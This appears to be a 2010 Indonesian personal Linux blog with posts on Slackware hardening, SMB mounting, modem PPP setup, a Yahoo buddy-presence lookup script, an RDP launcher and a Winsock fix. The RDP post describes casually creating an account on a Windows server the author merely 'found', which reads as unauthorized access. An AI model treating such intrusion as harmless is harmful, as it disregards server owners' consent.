Mencoba mengakses file sharing dari linux, simple dan tak terlalu pusing panjang lebar :

1.create mount point directory
root@darkstar # mkdir /mnt/smb

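2.mount smb share (a password given with -o password= ends up in shell history and is visible in the process list; mount.cifs also accepts credentials=<file> for this)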
root@darkstar # mount -t cifs -o username=<your username in smb server>,password=<password> //<smb server>/<share name> /mnt/smb

3.if it success, then do what you want... :)
root@darkstar # cd /mnt/smb

My S13 installation steps + system hardening

Berikut ini merupakan langkah-langkah yang saya jalankan ketika melakukan installasi linux slackware saya. Step dengan bahasa inggris lebih enak kayaknya :

1.install default system (no KDE)
2.upgrade kernel to 2.6.33.2
root@darkstar # cd /usr/src
root@darkstar # rm linux
root@darkstar # tar vxjf linux-2.6.33.2.tar.bz2
root@darkstar # ln -s linux-2.6.33.2 linux
root@darkstar # cd linux
root@darkstar # make
root@darkstar # make modules_install
root@darkstar # make install
root@darkstar # reboot
3.configuring sound system
root@darkstar # alsaconf
root@darkstar # alsamixer
root@darkstar # alsactl store
4.configuring X
root@darkstar # xorgsetup
5.add new user
root@darkstar # adduser
6.change run level (from 3 to 4)
root@darkstar # vim /etc/inittab
7.comment out all lines in /etc/inetd.conf
8.edit file /etc/X11/xdm/Xservers
:0 local /usr/bin/X -nolisten tcp :0
9.create file /etc/rc.d/rc.firewall (chmod it as executable)
#!/bin/bash
# Minimal IPv4 host firewall: drop inbound and forwarded packets by default,
# then accept replies to connections this host opened and loopback traffic.
#
# NOTE(review):
#  - The OUTPUT policy is not set here, so it keeps its current value
#    (ACCEPT unless something changed it).
#  - Existing rules are not flushed, so rules loaded earlier stay in effect
#    and running the script again appends duplicates.
#  - Only iptables (IPv4) is configured; IPv6 filtering is separate (ip6tables).
iptables -P INPUT DROP
iptables -P FORWARD DROP
# Allow packets that belong to, or are related to, an existing connection.
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Loopback is accepted only for 127.0.0.1 -> 127.0.0.1 on interface lo.
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -i lo -j ACCEPT
10.chmod important files
chmod 750 /bin/mt-st
chmod 600 /etc/cron*
chmod 600 /etc/ftpusers
chmod 600 /etc/hosts.allow
chmod 600 /etc/hosts.deny
chmod 600 /etc/inetd.conf
chmod 600 /etc/inittab
chmod 600 /etc/lilo.conf
chmod 600 /etc/login.defs
chmod 600 /etc/securetty
chmod 440 /etc/sudoers
chmod 600 /etc/syslog.conf
chmod 750 /sbin/badblocks
chmod 750 /sbin/debugfs
chmod 750 /sbin/depmod
chmod 750 /sbin/dumpe2fs
chmod 750 /sbin/explodepkg
chmod 750 /sbin/fdisk
chmod 750 /sbin/fsck
chmod 750 /sbin/fsck.ext2
chmod 750 /sbin/fsck.minix
chmod 750 /sbin/halt
chmod 750 /sbin/hwclock
chmod 750 /sbin/ifconfig
chmod 750 /sbin/init
chmod 750 /sbin/insmod
chmod 750 /sbin/installpkg
chmod 750 /sbin/isapnp
chmod 750 /sbin/killall5
chmod 750 /sbin/lilo
chmod 750 /sbin/makepkg
chmod 750 /sbin/mke2fs
chmod 750 /sbin/mkfs
chmod 750 /sbin/mkfs.minix
chmod 750 /sbin/mkdosfs
chmod 750 /sbin/mkswap
chmod 750 /sbin/modinfo
chmod 750 /sbin/pkgtool
chmod 750 /sbin/pnpdump
chmod 750 /sbin/removepkg
chmod 750 /sbin/rpc.portmap
chmod 750 /sbin/quotaon
chmod 750 /sbin/rdev
chmod 750 /sbin/runlevel
chmod 750 /sbin/setserial
chmod 750 /sbin/swapon
chmod 750 /sbin/tune2fs
chmod 750 /sbin/upgradepkg
chmod 750 /sbin/uugetty
chmod 750 /usr/bin/eject
chmod 4750 /usr/bin/gpasswd
chmod 750 /usr/bin/lpq
chmod 750 /usr/bin/lprm
chmod 4750 /usr/bin/lpr
chmod 750 /usr/bin/minicom
chmod 700 /usr/bin/nohup
chmod 700 /usr/bin/script
chmod 750 /usr/sbin/atd
chmod 750 /usr/sbin/atrun
chmod 750 /usr/sbin/crond
chmod 750 /usr/sbin/ctrlaltdel
chmod 750 /usr/sbin/dhcpd
chmod 750 /usr/sbin/dhcrelay
chmod 750 /usr/sbin/edquota
chmod 750 /usr/sbin/groupadd
chmod 750 /usr/sbin/groupdel
chmod 750 /usr/sbin/groupmod
chmod 750 /usr/sbin/grpck
chmod 750 /usr/sbin/grpconv
chmod 750 /usr/sbin/grpunconv
chmod 750 /usr/sbin/hdparm
chmod 750 /usr/sbin/imapd
chmod 750 /usr/sbin/in.comsat
chmod 755 /usr/sbin/in.fingerd
chmod 755 /usr/sbin/in.identd
chmod 750 /usr/sbin/in.talkd
chmod 000 /usr/sbin/in.rexecd
chmod 000 /usr/sbin/in.rlogind
chmod 000 /usr/sbin/in.rshd
chmod 750 /usr/sbin/in.telnetd
chmod 000 /usr/sbin/in.tftpd
chmod 750 /usr/sbin/in.timed
chmod 750 /usr/sbin/inetd
chmod 750 /usr/sbin/ipop3d
chmod 750 /usr/sbin/klogd
chmod 2750 /usr/sbin/lpc
chmod 550 /usr/sbin/makemap
chmod 750 /usr/sbin/mouseconfig
chmod 750 /usr/sbin/named
chmod 750 /usr/sbin/newusers
chmod 750 /usr/sbin/nmbd
chmod 750 /usr/sbin/ntpdate
chmod 750 /usr/sbin/ntpq
chmod 750 /usr/sbin/ntptime
chmod 750 /usr/sbin/ntptrace
chmod 750 /usr/sbin/pppd
chmod 750 /usr/sbin/pwck
chmod 750 /usr/sbin/pwconv
chmod 750 /usr/sbin/pwunconv
chmod 550 /usr/sbin/quotastats
chmod 750 /usr/sbin/rpc.bootparamd
chmod 750 /usr/sbin/rpc.mountd
chmod 750 /usr/sbin/rpc.nfsd
chmod 750 /usr/sbin/rpc.rusersd
chmod 750 /usr/sbin/rpc.rwalld
chmod 750 /usr/sbin/rpc.yppasswdd
chmod 750 /usr/sbin/rpc.ypxfrd
chmod 750 /usr/sbin/rpcinfo
chmod 750 /usr/sbin/showmount
chmod 750 /usr/sbin/smbd
chmod 750 /usr/sbin/syslogd
chmod 750 /usr/sbin/tcpd
chmod 750 /usr/sbin/tcpdchk
chmod 750 /usr/sbin/tcpdmatch
chmod 750 /usr/sbin/tcpdump
chmod 750 /usr/sbin/timeconfig
chmod 750 /usr/sbin/useradd
chmod 750 /usr/sbin/userdel
chmod 750 /usr/sbin/usermod
chmod 750 /usr/sbin/vipw
11.chattr important files
chattr +i /etc/exports
chattr +i /etc/hosts.equiv
chattr +i /etc/inetd.conf
chattr +i /etc/lilo.conf
chattr +i /etc/login.access
chattr +i /etc/login.defs
chattr +i /etc/protocols
chattr +i /etc/securetty
chattr +i /etc/services
12.end :)

Wednesday, May 12, 2010

I check my online buddy with this tool

Begitu banyak tool berbasis web yang menyediakan layanan lookup terhadap id yahoo, menurut saya semua sama dan cenderung kurang praktis. Ya memang kurang praktis (menurut saya), karena harus membuka browser, menunggu loading, memasukkan id dan menunggu loading lagi. Panjang kan? masukkin idnya juga satu-satu... hemm...
Langsung timbul deh pertanyaan, "bagaimana supaya tidak perlu ngetik id satu-satu dan langsung mendapat hasil list id buddy yang online". Ya! jawabannya membuat aplikasi sendiri, dan alhasil aplikasi berikut (aplikasi ini telah saya share pada beberapa komunitas online) :
#!/usr/bin/perl
# Online Buddy Lookup by zam
# 11 Mei 2010
use IO::Socket;
use threads;
use threads::shared;

# Shared scalar; in this script it is used only as the target of lock() in
# the clean-up loop at the end.
my $dtch:shared;

# IDs to look up, one thread per ID (the real list was withheld by the author).
@bud_list = qw(
this
is
my
buddy
list);#skipped for security reason... :P

print "===========================\n";
print "Online Buddy Lookup by zam\n";
print "===========================\n";
print "List Online Buddy:\n";
# Start one thread per ID; "req" is a bareword naming the sub defined below.
while (scalar(@bud_list) > 0){
 threads->create(req, shift(@bud_list));
 @jumthread = threads->list();
 # NOTE(review): the comparison sits inside scalar(); the numeric ">" already
 # evaluates the array as its element count, so this still means "more than
 # 54 threads exist". When that happens, wait for all of them to finish.
 if (scalar(@jumthread > 54)){
  foreach my $thrx (threads->list()){
   $thrx->join();
  }
 }
}
# Give the remaining threads 15 seconds, then detach each one that is not
# already detached and send it the 'KILL' signal.
sleep(15);
foreach my $thrsisa (threads->list()){
 lock($dtch);
 $thrsisa->detach() if ! $thrsisa->is_detached();
 $thrsisa->kill('KILL');
}
print "\n+++++++++++++++\nAll Done!\n+++++++++++++++\n";

# Look up one ID: open a TCP connection to opi.yahoo.com:80, send
# "GET /online?u=<id>", and print "[+] <id>" for every response line that
# contains the text "8c". Dies with "Connection Failed." if the socket cannot
# be opened.
# NOTE: the ID is placed into the request line exactly as given, with no
# URL-encoding, so IDs should come from a trusted list.
sub req(){
 my ($who) = @_;
 my %peer = (
  Proto    => "tcp",
  PeerAddr => "opi.yahoo.com",
  PeerPort => "80",
 );
 my $socket = IO::Socket::INET->new(%peer) or die "Connection Failed.";

 # Request line and headers, sent in the same order as before.
 foreach my $line ("GET /online?u=$who HTTP/1.1\r\n",
                   "User-Agent: Mozilla 5.0\r\n",
                   "Host: opi.yahoo.com\r\n",
                   "Connection: close\r\n\r\n") {
  print $socket $line;
 }

 # Scan the reply line by line for the marker text.
 while ($Data = <$socket>){
  print "[+] $who\n" if $Data =~ /8c/;
 }
 close($socket);
}

yeah...online buddy lookup zam version... =D

Tuesday, May 11, 2010

For The Menu (script yang sangat simple sekali)

Kali ini saya menemukan sebuah server dengan OS Windows. Iseng maen-maen di dalamnya dengan membuat sebuah akun untuk keperluan remote desktop.  Namun masih ada yang belum enak jika kita selalu mengetikkan command melalui terminal. Dengan ide yang simple saya berusaha membuat agar setiap akan melakukan koneksi remote desktop tidak perlu mengetik lagi, melainkan klik lewat menu. Berikut ini langkah-langkah yang saya lakukan untuk membuat menu tersebut :

1. Membuat file /usr/local/bin/rdp yang berisi
#!/bin/bash
# RDP Script Connect by zam
#
# Asks for a server name on the terminal and, when the answer is not empty,
# starts rdesktop against it. An empty answer does nothing.
printf '%s' "Masukkan RDP Server: "
read rdpserv
if [[ -n "$rdpserv" ]]; then
 rdesktop "$rdpserv"
fi
2. Tuliskan perintah urxvt -e sh -c "/usr/local/bin/rdp" ke dalam menu file.
Dan menu akan terlihat seperti berikut :



3. Klik pada menu akan menghasilkan prompt.



yess.. jadi... now login on the server :D~ :

Tuesday, May 4, 2010

Kayaknya ini mempercepat koneksi (walau sedikit banget efeknya)

Iseng membuat aplikasi perl untuk memasukkan daftar host sehingga sistem dapat melewatkan satu tahap dalam mencapai koneksi yaitu tahan dns request. Hehe, langsung saja sekedar ide saja... ;)
#!/usr/bin/perl
# 'let make a list :P' by zam

use Socket;
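use strict;
use warnings;

# Resolve the host name given on the command line and append an
# "<address>\t\t<name>" line to /etc/hosts.
#
# The appended entry pins whatever address the resolver returns at this
# moment: a stale or wrong answer stays in /etc/hosts until the line is
# removed by hand, and running the script twice appends the entry twice.
print "==================================\n";
print " -let make a list :P- by zam\n";
print "==================================\n";
if (@ARGV != 1) {
 print "Usage : $0 <nama host>\n";
 exit;
}
my $namahost = $ARGV[0];

# The name is written verbatim into a system file, so accept host-name
# characters only: whitespace or a newline in the argument would otherwise
# add extra fields or whole extra lines to /etc/hosts.
if ($namahost !~ /\A[A-Za-z0-9_][A-Za-z0-9._-]*\z/) {
 die "Invalid host name.\n";
}

# Resolve once and reuse the result, so the line shown on screen and the
# line written to the file cannot differ. In list context gethostbyname
# returns (name, aliases, addrtype, length, addresses...) and an empty list
# on failure.
my ($nama, $alias, $tipe, $panjang, @alamat) = gethostbyname($namahost);
die "Cannot resolve $namahost\n" unless @alamat;
# inet_ntoa only accepts a 4-byte packed IPv4 address.
die "No IPv4 address for $namahost\n" unless length($alamat[0]) == 4;

my $baris = inet_ntoa($alamat[0]) . "\t\t$namahost\n";

open(my $hosts, '>>', '/etc/hosts') or die "Cannot open /etc/hosts: $!\n";
print "Adding $baris";
print {$hosts} $baris or die "Cannot write /etc/hosts: $!\n";
close($hosts) or die "Cannot write /etc/hosts: $!\n";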

Monday, January 18, 2010

ZTE AC2726 + Slackware 13.0

Hari ini aku mencoba konek menggunakan "pon", iseng aja buat variasi.
Gak ada masalah, dengan konfigurasi seperti ini:

1. File "/etc/ppp/peers/smart"
hide-password noauth asyncmap 0 modem proxyarp noipx persist idle 1000000 connect "/usr/sbin/chat -v -f /etc/ppp/peers/smartconnect" debug ttyUSB0 921600 defaultroute noipdefault user "smart" remotename smart ipparam smart crtscts lock usepeerdns

2. File "/etc/ppp/peers/smartconnect"
ABORT BUSY ABORT 'NO CARRIER' ABORT VOICE ABORT 'NO DIALTONE' ABORT 'NO DIAL TONE' ABORT 'NO ANSWER' ABORT DELAYED '' "AT" 'OK' "ATQ0V1E0" 'OK' "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0" OK-AT-OK "ATDT#777" CONNECT \d\c

3. Tinggal masuk sebagai user root untuk menjalankan "pon smart" lewat terminal, dan tunggu beberapa saat.

Owh iya, ZTE AC2726 ini belum terdeteksi sebagai modem pada waktu pertama dipasang. Modem ini terdeteksi sebagai removable media. Dari hasil baca sana sini, katanya sih pake usb_modeswitch untuk mengatasi masalah ini. Setelah dicoba install memang bisa terdeteksi sebagai modem beneran, hehe...
Cukup merubah sedikit konfigurasinya "/etc/usb_modeswitch.conf" menjadi seperti ini:
DefaultVendor= 0x19d2 DefaultProduct= 0xfff5 TargetVendor= 0x19d2 TargetProduct= 0xfff1 # only for reference and 0.x versions MessageEndpoint=0x0a MessageContent="5553424312345678c00000008000069f030000000000000000000000000000"

Jadi, urutan perintah yang saya jalankan seperti ini:
1. /usr/sbin/usb_modeswitch -v 19d2 -p fff5 -V 19d2 -P fff1 -c /etc/usb_modeswitch.conf
2. /sbin/modprobe usbserial vendor=0x19d2 product=0xfff1
3. /usr/sbin/pon smart
4. buka browser

Karena aku tuh orangnya males, tak bikin seolah pendek langkahnya. Untuk memperpendeknya aku buat script bash "/usr/local/bin/aktifkan"
#!/bin/sh
# Bring the ZTE AC2726 online: switch the USB device to its modem
# product ID, wait, then dial the "smart" peer.

# Switch from product fff5 to fff1 using /etc/usb_modeswitch.conf.
sudo /usr/sbin/usb_modeswitch -v 19d2 -p fff5 -V 19d2 -P fff1 -c /etc/usb_modeswitch.conf

# Pause for five seconds before dialing.
sleep 5

# Start the PPP connection defined in /etc/ppp/peers/smart.
sudo /usr/sbin/pon smart
Tidak lupa juga aku tambahkan baris perintah "/sbin/modprobe usbserial vendor=0x19d2 product=0xfff1" ke file "/etc/rc.d/rc.modules" supaya module usbserial untuk device diload pada waktu startup.
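Aku edit pula "/etc/sudoers" dengan "visudo", tak tambah baris "xxx xxxnet=NOPASSWD:/usr/sbin/pon,/usr/sbin/usb_modeswitch" (xxx = nama user). Karena baris ini tidak membatasi argumen, user tersebut bisa menjalankan kedua perintah itu sebagai root dengan argumen apa saja; lebih ketat kalau argumennya ikut ditulis di sudoers, misalnya "/usr/sbin/pon smart".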

Tinggal eksekusi "/usr/local/bin/aktifkan" lewat terminal.


NB: new configuration at http://4s3m.blogspot.com/2010/07/zte-2726-smart-slackware-130.html

Sunday, January 17, 2010

[Tips] -- Memperbaiki winsock error

Seperti yang pernah terjadi berkali-kali pada komputer dengan OS windows saya, errornya winsock ini ditandai dengan munculnya pesan kurang lebih seperti ini: "An error occurred while renewing interface 'Internet': An operation was attempted on something that is not a socket". Dan ketika saya melakukan ping ke ip komputer kamar sebelah, selalu muncul pesan "Destination Host Unreachable", padahal sebelumnya normal-normal saja.
Setelah cari info sana-sini, berikut ini cara yang saya gunakan untuk melenyapkan error tersebut:
1. Jalankan Regedit dan hapus:
   - HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
   - HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2
2. Restart komputer kemudian buka "Network Connections"
   - klik kanan icon koneksi dan pilih "Properties"
   - klik tombol "Install"
   - pilih "Protokol" dan klik tombol "Add"
   - klik tombol "Have Disk"
   - arahkan ke direktori "\Windows\inf"
   - klik tombol "Open" lalu "OK"
   - pilih "Internet Protocol (TCP/IP)"
   - klik tombol "OK"
   - restart komputer
Cukup simpel memang,
tapi kalau saya tidak berusaha menangani error tersebut dan selalu mengandalkan tukang reparasi ya sampai sekarang saya tidak akan pernah ngerti hal se simpel ini.

pertamax!!!

ini merupakan postingan pertama di blog ini...